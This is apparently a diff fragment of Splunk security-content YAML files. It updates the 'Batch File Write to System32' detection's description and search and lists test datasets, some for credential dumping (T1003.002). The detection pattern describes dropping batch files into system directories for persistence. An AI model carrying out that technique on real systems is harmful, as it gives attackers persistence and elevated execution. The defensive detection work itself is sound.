- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1003.002/atomic_red_team/windows-sysmon.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1003.002/atomic_red_team/windows-sysmon.log
source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
sourcetype: xmlwineventlog
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1003.002/atomic_red_team/crowdstrike_falcon.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1003.002/atomic_red_team/crowdstrike_falcon.log
source: crowdstrike
sourcetype: crowdstrike:events:sensor
@@ -1,25 +1,30 @@
name: Batch File Write to System32
id: 503d17cb-9eab-4cf8-a20e-01d5c6987ae3
version: 4
date: '2023-04-11'
version: 5
date: '2024-05-19'
author: Steven Dick, Michael Haag, Rico Valdez, Splunk
status: production
type: TTP
description: The search looks for a batch file (.bat) written to the Windows system
directory tree.
description: The following analytic detects the creation of a batch file (.bat) within
the Windows system directory tree, specifically in the System32 or SysWOW64 folders.
It leverages data from the Endpoint datamodel, focusing on process and filesystem
events to identify this behavior. This activity is significant because writing batch
files to system directories can be indicative of malicious intent, such as persistence
mechanisms or system manipulation. If confirmed malicious, this could allow an attacker
to execute arbitrary commands with elevated privileges, potentially compromising
the entire system.
data_source:
- Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where
Processes.process_name=* by _time span=1h Processes.process_guid Processes.process_name Processes.dest Processes.user
| `drop_dm_object_name(Processes)` | join process_guid
[| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_path IN ("*\\system32\\*", "*\\syswow64\\*") Filesystem.file_name="*.bat" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid
| `drop_dm_object_name(Filesystem)`]
| table dest user file_create_time, file_name, file_path, process_name, firstTime, lastTime
| dedup file_create_time
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `batch_file_write_to_system32_filter`'
- Sysmon Event ID 1
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=* by _time span=1h Processes.process_guid Processes.process_name
Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid
[| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\system32\\*",
"*\\syswow64\\*") Filesystem.file_name="*.bat" by _time span=1h Filesystem.dest
Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid
| `drop_dm_object_name(Filesystem)`] | table dest user file_create_time, file_name,
file_path, process_name, firstTime, lastTime | dedup file_create_time | `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)` | `batch_file_write_to_system32_filter`'
how_to_implement: To successfully implement this search you need to be ingesting information
on process that include the name of the process responsible for the changes from
your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition,
@@ -79,6 +84,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.002/batch_file_in_system32/windows-sysmon.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.002/batch_file_in_system32/windows-sysmon.log
source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
sourcetype: xmlwineventlog

Some files were not shown because too many files have changed in this diff Show More